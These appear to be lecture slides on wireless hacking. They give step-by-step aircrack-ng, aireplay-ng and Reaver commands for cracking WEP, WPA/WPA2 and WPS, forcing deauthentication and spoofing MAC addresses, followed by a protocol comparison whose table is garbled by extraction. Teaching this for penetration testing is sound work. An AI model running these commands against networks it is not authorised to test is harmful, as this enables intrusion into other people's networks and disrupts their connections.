UNIT -5

Wire less hacking

wireless network
 A wireless network is a set of two or more devices connected
with each other via radio waves within a limited space range.

 Wireless networks are widely used and it is quite easy to set

them up.They use IEEE 802.11 standards.

 A wireless router is the most important device in a

wireless network that connects the users with the Internet.

 In a wireless network, we have Access Points which are

extensions of wireless ranges that behave as logical switches.
 As wireless networks communicate through radio waves, a
hacker can easily sniff the network from a nearby location.

 Most attackers use network sniffing to find the (service set

identifier) SSID and hack a wireless network.

Wire less hacking Requirements
 Wireless access point
 Wireless adapter supporting packet injection

 The access point is required because we don’t want to attack the

neighbor’s access point, because it would be unethical, and as a
penetration tester or an ethical hacker, you should make sure that you
follow ethics.
 The second and the most important requirement is a wireless adapter
that supports packet injection and is also able to sniff in the monitor
mode.
 Eg :Alfa AWUS036H wireless adapter , it not only supports packet
injection, but also BackTrack has preinstalled drivers of it, so we don’t
have to do the tedious job of downloading and installing them
 Once you have an Alfa network adapter that supports packet
injection and has all drivers installed, you can connect the
adapter to your computer, and since we are running
BackTrack from our virtual machine, we need to attach the
network adapter to our BackTrack machine.
 This can be done by going into Vm → Removable Devices
→ Realtek RTL8187_Wireless and clicking the
“Connect(Disconnect from HOST)” option
 Next, we will execute “iwconfig” command to confirm that
our BackTrack machine has been able to detect our network
adapter.
 Our BackTrack machine has managed to detect our wireless
network adapter.
 We could use WICD network manager from Application →
Internet → Wicd Network Manager to check available
wireless networks
 Once we have connected to the appropriate access point and
executed “iwconfig”, we will see that the wlan0 interface
contains information regarding ESSID, MAC address, etc
Wifi hacking tools
1 Aircrack-ng.
Aircrack is one of the most popular tools for WEP/WPA/WPA2
cracking. ...
2 Reaver
3 Pixiewps
4 Wifite
5 Wireshark
6 oclHashcat
7 Fern Wifi Cracker
8 Wash.
9.Kismet
10.WEPcrack
. Aircrack-ng

 Aircrack is one of the most popular tools for WEP/WPA/WPA2

cracking.

 The Aircrack-ng suite contains tools to capture packets and handshakes,

de-authenticate connected clients and generate traffic and tools to
perform brute force and dictionary attacks.

 Aicrack-ng is an all-in-one suite containing the following tools

– Aircrack-ng for wireless password cracking
– Aireplay-ng to generate traffic and client de-authentication
– Airodump-ng for packet capturing
– Airbase-ng to configure fake access points.

The most common ones are airodump-ng, aireply-ng, and airmon-ng.

Iwconfig command
 On Linux operating systems, the iwconfig command configures
a wireless network interface.
 It is used to set the parameters of the network interface that are
particular to the wireless operation like SSID, frequency etc.
 Parameters examples :
 ssid Set the ESSID (or Network Name - in some products, it
may also be called Domain ID)
 nwid Set the Network ID.
 nickSet the nickname, or the station name.
 Mode Set the operating mode of the device, which depends
on the network topology
Turning on the Monitor Mode
 to sniff on wireless networks, we need to make sure that our
network card is in the monitor mode.
 wireless cards are converted in sniffing modes, they are
called monitor mode.

 We can use the following command to change the network

card to the monitor mode:

 $airmon-ng start wlan0

Uncovering Hidden SSIDs
 It’s common practice for network administrators to disable
broadcasting SSID.
 Normally, the SSIDs are sent in the form of beacon frames,
but this does not happen when a network administrator
disables an SSID.
 When ever client reassociates with the access point, it will
send the SSID parameter in plain text, which will reveal the
real SSID
 Now, we have two methods to do this:
 the first one is that we keep analyzing beacon frames and
wait for the client to disconnect and reconnect to the access
point;
 the second option is that we send disassociation packets by
using a deauthentication attack, which will force everyone on
the network to disconnect and then reconnect to the access
point revealing to us the SSID.
Steps for wifi hacking
 The attacker first configures his/her own network interface card.
That is the network interface card is set to monitor mode and can
perform packet injection.
 Then the properly configured network interface card is used to
perform a de-authentication attack.
 The de-authenticated client then reconnects to the access point.
 This allows us to capture the four-way handshake.
 We then perform a brute-force attack or a dictionary attack on the
captured handshake.
 Once the attack is completed we have the decrypted password.
Monitoring Beacon Frames on
Wireshark
 Now that we have the monitor mode enabled, we will sniff
on the mon0 network interfaces, which will bring us beacon
frames containing the SSID that is being broadcasted.
 If the SSID is not broadcasted, it won’t show up.
 Whenever the client authenticates against the access point
with the hidden SSID, it will send an SSID parameter;
therefore, we can easily figure out what the real SSID is
Monitoring with Airodump-ng
 The easy way around is to use airodump-ng to start
monitoring the traffic; as soon as the client authenticates, the
SSID will be revealed.

 # airodump-ng mon0
Cracking a WEP Wireless Network with
Aircrack-ng
 WEP (Wired Equivalent Privacy) was one of the first
authentication and encryption used for wire less networks.
 we will use aircrack-ng to demonstrate how easy it is to
crack a WEP key.
 Placing Your Wireless Adapter in Monitor Mode
 Step 1—First thing , we need to make sure that our network
card is placed into monitor mode, we have already learnt that
we can use the “airmon-ng start wlan0” command to
accomplish this task.
 Determining the Target with Airodump-ng
 Step 2—Next, we will use airodump-ng to discover our
neighbor networks with WEP encryption enabled.
 We can see our target with an essid (same as ssid) of “Linksys”
and with BSSID of 98:FC:11:C9:14:22 and it’s on the
channel 6. We should make a note of the essid, bssid, and
channel because we will need them in future
We can see our target with an
essid (same as ssid) of “Linksys”
and with BSSID of
98:FC:11:C9:14:22 and it’s on
the channel 6
 Attacking the Target
 Step 3—In order to crack the WEP key, we would need to capture
of the contents of the data file and write it to a file.

 Structure
 airodump-ng mon0 --bssid –c (channel) –w (file name to save)

 Command:
 airodump-ng mon0 --bssid 98:fc:11:c9:14:22 --channel 6 --write
RHAWEP
 Speeding Up the Cracking Process
 Step 4—In order to decrypt the wep key, we would need
data packets, but waiting to collect them would be time
consuming. To speed up this process, we can use a fake
authentication attack which will associate our MAC address
with the access point.
 Structure
 aireplay-ng - 1 3 –a (bssid of the target) (interface)
 Command:
 aireplay-ng -1 3 –a 98:fc:11:c9:14:22 mon0
 Injecting ARP Packets
 Step 5—
 The success rate of our attack depends upon the number of
initialization vectors we gather.
 A fake authentication attack does not generate ARP packets,
therefore, we would need to use the attack number 3—“ARP
Request Replay”—which is the most effective way of generating
initialization vectors.
 Structure
 aireplay-ng 3 –b (bssid of target) –h (Mac address of mon0)
(interface)
 Command:
 aireplay-ng -3 –b 98:fc:11:c9:14:22 –h 00:c0:ca:50:f8:32
mon0
 Cracking the WEP
 Step 6—Finally, it’s the time to decrypt the contents of the
RHAWEP-0.1-cap file.
 We will use aircrack-ng to do this.

 Command:
 aircrack-ng RHAWEP-0.1-cap
Key found
 Cracking a WPA/WPA2 Wireless
Network Using Aircrack-ng
 WPA(Wi-Fi Protected Access. ) A security protocol developed by
the Wi-Fi Alliance in 2003 for use in securing wireless networks;
designed to replace the WEP protocol.
 The WPA/WPA2 key that we would use to authenticate on a
wireless network is used to generate another unique key
 Required parameters .
 SSID of the network authenticator
 Nounce (ANounce),
 authenticator MAC address (access point MAC),
 suppliant MAC address (WiFi client MAC).
 four-way handshake, which takes place between a client and an
access point,
Cracking a WPA/WPA2 Wireless
Network Using Aircrack-ng
 Step 1—First of all, ensure that your network card is inside
the monitoring mode.
 Step 2—Next, we would listen on the mon0 interfaces for
other access points having encryption set to either wpa or
wpa2.
 We would use the “airmon-ng mon0” command to do it.
 We will take a note of its BSSID and the channel that it’s on,
this information would be useful in the upcoming steps.
BSSID: F4:3E:61:92:68:D7
 Channel: 6
 Capturing Packets
 Step 3—Next, we need to save the data associated with our
access point to a specific file. The inputs we need to specify
are the channel, the bssid, and the file name to write.
 Command:
 airodump-ng –c 1 –w rhawap --bssid F4:3E:61:92:68:D7
mon0
 –w—File to write
 –c—Channel
 Capturing the Four-Way Handshake
 Step 4—In order to successfully crack WAP, we would need
to capture the four-way handshake. As mentioned, to achieve
this we could use a deauthentication attack to force clients to
disconnect and reconnect with the access point.
 Structure :
 aireplay-ng --deauth 10 –a ≤Target AP≥ –c ≤Mac address
of Mon0≥mon0
 Command: aireplay-ng --deauth 10 –a F4:3E:61:92:68:D7 –
c 94:39:E5:EA:85:31 mon0
 Cracking WPA/WAP2

 COMMAND:
 aircrack-ng –w Wordlist ‘capture_file’.cap

 Command:
 aircrack-ng rhawap.cap –
w/pentest/passwords/wordlists/darkc0de.ls
Bypassing MAC Filters on Wireless
Network
 it’s also a common practice for network administrators to
apply MAC filtering on the access point so that only white-
listed hosts with MAC addresses would be able to connect to
the access point.
 MAC filtering is also a part of low-level security along with
hiding the SSID;
 an attacker can spoof a legitimate MAC address to connect to
the access point. Here is how this attack would be carried
out:
 1. The attacker would scan the access point for the hosts that
are already connected to the access point.
 2. Next, the attacker would note down the MAC address of
the legitimate client that is connected to the access point and
spoof the MAC address to get into the white list and would
be able to connect and use the access point
 Step 1—The first command we would use is “airodump-ng”
to scan for all the neighbor networks.
 Step 2—The next step would be to find a client that is
already associated with the access point. We will use
airodump to find it for us.
 Command: airodump-ng –c 1 –a –bssid F4:3E:61:9C:77:3B
mon0

 Since the access point is on channel 1, we would type –c 1;

the “–a” parameter would display clients that are currently
associated with the access point
 Step 3—The final step would be to spoof our MAC address
and change it to one of the client’s. We can use a neat
program in BackTrack called macchanger.

 we would use the following command to spoof our current

MAC address.
 macchanger –m B0:D0:9C:5C:EF:86 wlan0
Using Reaver to Crack WPS-Enabled
Wireless Networks
 Reaver is the penetration tester’s ultimate choice, this tool
can help you crack WPA/WPA2 keys within a matter of
hours.
 Reaver does not directly perform a brute force attack against
the WPA/ WPA2 keys, but it performs a brute force attack
against the WPS pins.
 The WPS pins are eight digits in length, and as most routers
use default pins, they can easily be compromised.
 Step 1—Make sure that your wireless card is in the monitor
mode.
 Step 2—Next, we would use airodump-ng to select our
target we want to attack.
In this case we target the access point with ESSID PTCL-BB, and BSSID F4:3E:61:F5:FC:49. We will
copy the BSSID, since this will be the only input required for reaver to work.
 Step 3—Now, we will use reaver to attack our access point. The
command would be as follows:

 reaver –i mon0 –b F4:3E:61:F5:FC:49 –vv

 T he –I parameter was used to specify the interface, which is

mon0, followed by the –b parameter used to define the bssid
 and –vv for the verbosity. The verbosity is set to twice, which
means that it will display each pin’s number as it’s tried against the
access point
Wi-Fi security protocols
 Wi-Fi security protocols use encryption technology to secure
networks and protect the data of their clients.
 Wireless networks are often less secure than wired
ones, so wireless security protocols are crucial for keeping
you safe online.
 The most common Wi-Fi security protocols today are WEP,
WPA, and WPA2.

 Wired Equivalent Privacy (WEP)

 Wi-Fi Protected Access (WPA)
 Wi-Fi Protected Access 2 (WPA 2)
 WEP (Wired Equivalent Privacy) is the oldest and most
common Wi-Fi security protocol.
 It was the privacy component established in the IEEE
802.11, a set of technical standards that aimed to provide a
wireless local area network (WLAN) with a comparable level
of security to a wired local area network (LAN).
 WPA (Wi-Fi Protected Access) is a wireless security protocol
released in 2003 to address the growing vulnerabilities of its
predecessor, WEP.
 The WPA Wi-Fi protocol is more secure than WEP, because it
uses a 256-bit key for encryption, which is a major upgrade
from the 64-bit and 128-bit keys used by the WEP system.
 WPA also uses the Temporal Key Integrity Protocol (TKIP),
which dynamically generates a new key for each packet, or
unit of data. TKIP is much more secure than the fixed-key
system used by WEP.
 WPA2 (Wi-Fi Protected Access 2) is the second generation
of the Wi-Fi Protected Access wireless security protocol.
Like its predecessor, WPA2 was designed to secure and
protect Wi-Fi networks.
 WPA2 ensures that data sent or received over your wireless
network is encrypted, and only people with your network
password have access to it.
 A benefit of the WPA2 system was that it introduced the
Advanced Encryption System (AES) to replace the more
vulnerable TKIP system used in the original WPA protocol.
 WEP vs WPA vs WPA2:

WEP WPA WPA2

year introduced 1999 2003 2004

Encryption protocol Fixed-key TKIP CCMP

Session key size 64-bit/128-bit 256-bit 256-bit

RC4 stream
Cipher type TKIP (RC4-based) AES
cipher

Cyclic Redundancy Message

Data integrity CCMP
Check Integrity Check

Open
Authentication PSK + PMK(pair-
system/Shared PSK(pre shared key)
method wise shared key)
key